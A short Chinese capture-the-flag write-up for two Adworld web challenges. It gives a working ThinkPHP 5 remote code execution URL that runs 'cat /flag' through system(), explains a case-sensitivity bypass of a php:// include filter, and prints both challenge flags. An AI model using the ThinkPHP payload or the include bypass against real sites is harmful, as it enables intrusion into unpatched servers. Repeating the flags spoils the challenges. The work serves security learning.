攻防世界--高手进阶区（2）php_rce/Web_php_include

攻防世界–高手进阶区（2）php_rce/Web_php_include

php_rce

题目描述：暂无

解题思路：无描述，打开环境发现是thinkPHP V5

ThinkPHP V5远程执行公开漏洞（可以具体分析一下）

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

flag{thinkphp5_rce} flag{thinkphp5_rce}

Web_php_include

题目描述：暂无

解题思路：无描述，是一个php代码

page传参但是带有php://的都会被替换成空，而str_replace()是区分大小写的
str_replace()以其他字符替换字符串中的一些字符(区分大小写)
strstr() 查找字符串首次出现的位置。返回字符串剩余部分
就可以构成大小写绕过

可以直接看到fl4gisisish3r3.php文件了

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

补充：这道题有好几种解题思路/
PHP://input post:
index.php?page=data:text/plain,;
index.php?page=data:text/plain,